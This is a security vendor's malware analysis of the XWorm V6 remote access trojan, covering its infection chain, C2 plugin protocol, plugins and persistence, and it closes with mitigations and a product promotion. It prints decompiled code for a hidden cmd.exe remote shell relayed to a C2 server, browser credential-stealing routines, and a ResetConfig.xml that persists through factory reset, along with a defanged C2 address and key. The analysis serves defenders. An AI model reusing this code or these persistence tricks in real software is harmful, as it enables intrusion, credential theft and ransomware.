Picus Labs | 10 MIN READ

CREATED ON October 23, 2025

XWorm Rises Again: Dissecting the Modular Malware's V6 Resurrection

The cybersecurity landscape is constantly being reshaped, but some threats refuse to retire. XWorm, a versatile Remote Access Trojan (RAT), first seen in 2022, unexpectedly re-emerged in 2025 with Version 6.0. This resurgence, following the presumed retirement of its developer, XCoder, and the chaotic distribution of trojanized cracked versions of its predecessor (V5.6), solidifies XWorm as a persistent and evolving danger.

Trellix security researchers’ analysis of the XWorm V6.0 campaign [1], including the latest V6.4 modifications, reveals a highly modular and potent toolset. Understanding XWorm's core delivery mechanism and its specialized plugins is critical for cybersecurity professionals to build effective, multi-layered defenses.

From Abandonment to Resurrection: The XWorm V6 Timeline

In the latter half of 2024, XWorm's original developer, XCoder, vanished, leaving V5.6 as the final official release. This created a gap immediately exploited by threat actors who distributed malicious, cracked versions. The situation was compounded by the public disclosure of a critical Remote Code Execution (RCE) vulnerability in V5.6, allowing attackers with the Command and Control (C2) encryption key to execute arbitrary code. Many in the security community believed the XWorm chapter was closed.

That belief was shattered on June 4, 2025, when a new account, XCoderTools, announced the official release of XWorm RAT V6 on an underground forum. The new version was promoted as "fully re-coded, RCE-Fixed, and packed with updated tools."

The core features highlighted in the announcement included:

Fully patched - No RCE, no exploits (unlike V5.6 cracked).
Updated plugins - All tools work out-of-the-box.
Persistence builder + startup options.
One-time Lifetime Subscription: $500.

Since its release, we have observed a rapid adoption of XWorm V6.0, indicating its immediate threat relevance to threat actors globally.

The Infection Chain: A Stealthy, Multi-Stage Delivery

A prominent XWorm V6.0 campaign illustrates a sophisticated, multi-stage delivery process designed to evade detection:

Stage 1: Initial Dropper (Malicious JS): The attack begins with a JavaScript (JS) file, often delivered via a phishing email. When executed, it simultaneously initiates the download and execution of the next stage (a PowerShell script) and, for distraction, displays a harmless decoy PDF document.
Stage 2: Evasion and Setup (PowerShell Script): The PowerShell (PS1) script runs and immediately works to disable AMSI (Antimalware Scan Interface), a key Windows security measure, to bypass detection. It then stages the final payload—the XWorm Client, and an associated injector tool.
Stage 3: Injection (DLL File): The injector, a Dynamic Link Library (DLL), is designed to inject the core XWorm Client's malicious code into a benign, legitimate Windows process, such as RegSvcs.exe. This allows XWorm to execute stealthily within a trusted application's memory space.
Final Payload: XWorm V6.0 Client: Once injected, the client establishes a connection to its C2 server (e.g., 94[.]159[.]113[.]64 on port 4411).

We noted a key configuration change: the default C2 communication key is "<666666>" in V6.0, a departure from the V5.6 default key "<123456789>".

Pivotal Plugins: XWorm's Modular Arsenal

XWorm's true power lies in its modular plugin system, where the RAT operator can remotely load and execute additional payloads (DLL files) in memory. The core client determines a unique machine identifier, the Client ID, which is a crucial element in its operation.

The unique Client ID is generated by hashing a concatenation of system information:

public static string ID()
{
string text;
try
{
text = Helper.GetHashT(string.Concat(new object[]
{
Environment.ProcessorCount,
Environment.UserName,
Environment.MachineName,
Environment.OSVersion,
new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize
}));
}
catch (Exception ex)
{
text = "Err HWID";
}
return text;
}

This Client ID is used to:

Uniquely identify the victim's machine.
Name the registry subkey under HKCU\SOFTWARE\ where plugins are stored persistently.
Serve as the base for the cryptographic key/IV generation in the ransomware and file management plugins.

Plugin Storage and Execution Flow

When a plugin is requested by the C2, the client first checks if it has been previously received by searching the registry for an entry whose Name is the plugin's SHA-256 hash.

The stored plugin data is a REG_BINARY value containing a Gzip compressed DLL file with the first four bytes representing the uncompressed size.

The C2 commands governing plugin management are:

Command Handled	Description
"plugin"	Checks for local existence. If not found, sends "sendPlugin" command back to C2 to request the payload. If found, it's decompressed and executed.
"savePlugin"	Receives the Base64-encoded plugin data from the C2, stores it locally (e.g., in the registry), decompresses it, and then loads it into memory.
"RemovePlugins"	Deletes the persistent registry subkey under HKCU\SOFTWARE\<CLIENT ID>, wiping all stored plugins.

This process is reflected in the following code snippet, which shows the handling logic for these commands:

else if (Operators.CompareString(text, "plugin", false) == 0)
{
Messages.Pack = array;
if (Helper.GetValue(array[1]) == null)
{
ClientSocket.Send("sendPlugin" + Settings.SPL + array[1]);
}
else
{
Messages.Plugin(Helper.Decompress(Helper.GetValue(array[1])));
}
}
else if (Operators.CompareString(text, "savePlugin", false) == 0)
{
byte[] array2 = Convert.FromBase64String(array[2]);
Helper.SetValue(array[1], array2);
Messages.Plugin(Helper.Decompress(array2));
}
else if (Operators.CompareString(text, "RemovePlugins", false) == 0)
{
MyProject.Computer.Registry.CurrentUser.DeleteSubKey(Helper.PL);
Messages.SendMSG("Plugins Removed!");
}

Dissecting Key XWorm V6 Plugins

Trellix analysis identified a wide variety of plugins used in the wild, enabling a full spectrum of malicious activity, including data exfiltration, system control, and ransomware deployment.

1. Shell.dll: The Remote Command Prompt

This plugin grants the operator a remote shell via cmd.exe. It configures the process to run without a visible window and redirects its standard input, output, and error streams back to the C2 server, allowing for real-time command execution.

The command-handling logic for the remote shell is as follows:

if (Operators.CompareString(text, "R/", false) != 0)
{
if (Operators.CompareString(text, "runshell", false) != 0)
{
if (Operators.CompareString(text, "closeshell", false) == 0)
{
ClientSocket.IsDisconnected();
}
else
{
Messages.MyProcess.StandardInput.WriteLine(array[1]);
Messages.MyProcess.StandardInput.Flush();
}
}
else
{
Messages.MyProcess = new Process();
ProcessStartInfo startInfo = Messages.MyProcess.StartInfo;
startInfo.FileName = "CMD.EXE";
startInfo.UseShellExecute = false;
startInfo.CreateNoWindow = true;
startInfo.RedirectStandardInput = true;
startInfo.RedirectStandardOutput = true;
startInfo.RedirectStandardError = true;
Messages.MyProcess.Start();
Messages.MyProcess.BeginErrorReadLine();
Messages.MyProcess.BeginOutputReadLine();
Messages.AppendOutputText("Process Started at: " + Messages.MyProcess.StartTime.ToString());
}
}

"runshell": Initializes the hidden CMD.EXE process.
General Command: If not "runshell", "closeshell", or "R/", the command (array[1]) is written to the command prompt's standard input.

2. TCPConnections.dll: Network Reconnaissance and Control

This plugin retrieves a complete list of active TCP connections on the compromised machine, including the Process ID (PID) that owns each connection, its local/remote address and port, and its state. This functionality allows the attacker to spy on network activity and manually kill connections.

The data collection and formatting logic:

StringBuilder stringBuilder = new StringBuilder();
TcpConnectionTableHelper.MIB_TCPROW_OWNER_PID[] allTcpConnections = TcpConnectionTableHelper.GetAllTcpConnections();
int num = allTcpConnections.Length;
int num2 = num - 1;
for (int i = 0; i < num2; i++)
{
TcpConnectionTableHelper.MIB_TCPROW_OWNER_PID mib_TCPROW_OWNER_PID = allTcpConnections[i];
string text;
string text2;
unchecked
{
text = string.Format("{0}:{1}", TcpConnectionTableHelper.GetIpAddress((ulong)((long)mib_TCPROW_OWNER_PID.LocalAddr)), mib_TCPROW_OWNER_PID.LocalPort);
text2 = string.Format("{0}:{1}", TcpConnectionTableHelper.GetIpAddress((ulong)((long)mib_TCPROW_OWNER_PID.RemoteAddr)), mib_TCPROW_OWNER_PID.RemotePort);
}
stringBuilder.Append(string.Concat(new string[]
{
Conversions.ToString(mib_TCPROW_OWNER_PID.OwningPid),
"-->",
text,
"-->",
text2,
"-->",
((TCP_CONNECTION_STATE)mib_TCPROW_OWNER_PID.state).ToString(),
}));
}

This structured output, separated by "-->", is sent back to the C2. The command "KillTCPConnection" allows the operator to terminate specific processes by their PID.

3. merged.dll and SystemCheck.Merged.dll: Advanced Infostealing

These plugins are designed to bypass the hardened security of modern web browsers (Chrome v20+).

The older merged.dll attempts to launch and then inject a resource DLL (chrome_decrypt) into running browser processes to steal cookies, passwords, and credit card information. The targeted browsers and their hardcoded paths are:

Dictionary<string, string> dictionary = new Dictionary<string, string>
{
{ "chrome", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" },
{ "msedge", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" },
{ "brave", "C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe" }
};
byte[] chrome_decrypt = Resources.chrome_decrypt;
try
{
foreach (KeyValuePair<string, string> keyValuePair in dictionary)
{
bool flag2 = Plugin.IsBrowserInstalled(keyValuePair.Value);
if (flag2)
{
int mainBrowserProcessId = Plugin.GetMainBrowserProcessId(keyValuePair.Key);
bool flag3 = mainBrowserProcessId == 0;
if (flag3)
{
Plugin.LaunchBrowser(keyValuePair.Value, keyValuePair.Key);
}
}
}
}

The newer SystemCheck.Merged.dll (V6.4) implements an updated, more stealthy technique. It avoids DLL injection and hardcoded paths by dropping an external decryption utility (sourced from a public GitHub repository) and running it as a hidden process with the browser name as an argument.

public static void RunChromiumDecryptions() {
string text = Path.Combine(Path.GetTempPath(), "XRecovery", "Browsers");
bool flag = Directory.Exists(text);
if (flag) { Directory.Delete(text, true); } Thread.Sleep(3000);
bool flag2 = !Directory.Exists(text);
if (flag2) { Directory.CreateDirectory(text); }
string text2 = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".exe");
File.WriteAllBytes(text2, Resources.ChromiumDecryption);
string[] array = new string[] { "chrome", "brave", "edge" };
foreach (string text3 in array) {
Plugin.RunProcessHidden(text2, string.Format(" {0} -o \"{1}\\\"", text3, text));
}
File.Delete(text2);
}

4. FileManager.dll and Ransomware.dll: Financial Extortion

The FileManager.dll provides extensive file system control, including downloading/uploading files and, critically, AES-CBC file encryption/decryption utilizing a key/IV derived from the Client ID.

The dedicated Ransomware.dll leverages the same AES-CBC logic for a full-scale encryption attack. After encrypting the victim's files, it drops the ransomware note, How To Decrypt My Files.html, and sets a custom desktop image with the ransom message.

The ransomware component shares notable code overlap with the NoCry Ransomware (2021), including the key/IV generation algorithm and anti-debugging/sandbox checks.

Unsettling Persistence and The 'Crack' Complication

XWorm V6 employs a variety of persistence techniques, including Logon Scripts, Run keys, and an advanced method using ResetConfig.xml. This last method, which has also been adopted by other malware, ensures the malware re-infects the system even if the user attempts a full Windows factory reset.

<?xml version="1.0" encoding="utf="utf-8"?>
<Reset>
<Run Phase="FactoryReset_AfterDiskFormat">
<Path>C:\Recovery\OEM\install.cmd</Path>
<Duration>5</Duration>
<Wait>true</Wait>
</Run>
</Reset>

The cycle of compromise continues, as the cracked XWorm V6.0 builder was released shortly after the official version. Worryingly, security researchers have observed a further complication: XWorm C2 servers and even XWorm V6.0 Builders are being found infected with XWorm malware themselves, suggesting that XWorm operators are now falling victim to their own or a competitor’s malware, often being re-infected with a different configuration.

Conclusion and Mitigation Strategies Against XWorm Malware Rise

The re-emergence of XWorm V6 confirms that modular threats, once established, can pose a dynamic and persistent risk. To defend against this evolving threat, organizations must adopt a security posture that moves beyond simple prevention to focus on detection and response to malicious behavior post-infection.

A multi-layered defense must include:

Endpoint Detection and Response (EDR): Essential for detecting the suspicious, low-level behaviors of the plugins, such as process injection (RegSvcs.exe injection), filesystem manipulation (Ransomware.dll), and the creation of hidden shell processes (Shell.dll).
Proactive Defenses: Robust email and web security to block the initial malicious JS and PS1 droppers before they can execute on the endpoint.
Continuous Network Monitoring: To detect the predictable Command and Control (C2) communication patterns (e.g., the C2 address 94[.]159[.]113[.]64 and port 4411) used to download and exfiltrate data.
Monitoring for Persistence Artifacts: Regularly check common persistence locations, including registry keys under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the creation of files within the C:\Recovery\OEM directory.

By understanding the distinct operational features, from the Client ID generation to the C2 command structure, organizations can better tune their security tools to detect and neutralize this formidable and resurrected threat.

How Picus Helps Defend Against XWorm V6 Malware Attacks?

The Picus Security Validation Platform safely emulates XWorm V6 and prior versions, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.

You can also test your defenses against hundreds of other malware variants, such as SnipBot, SlipScreen Loader, RustyClaw, within minutes with a 14-day free trial of the Picus Platform.

Threat ID	Threat Name	Attack Module
62292	XWorm RAT Download Threat	Network Infiltration
53558	XWorm RAT Email Threat	Email Infiltration
76431	XWorm Malware Downloader Download Threat	Network Infiltration
65640	XWorm Malware Downloader Email Threat	Email Infiltration
60030	XWorm Loader Download Threat	Network Infiltration
53031	XWorm Loader Email Threat	Email Infiltration
89966	Xworm Worm Download Threat	Network Infiltration
63930	Xworm Worm Email Threat	Email Infiltration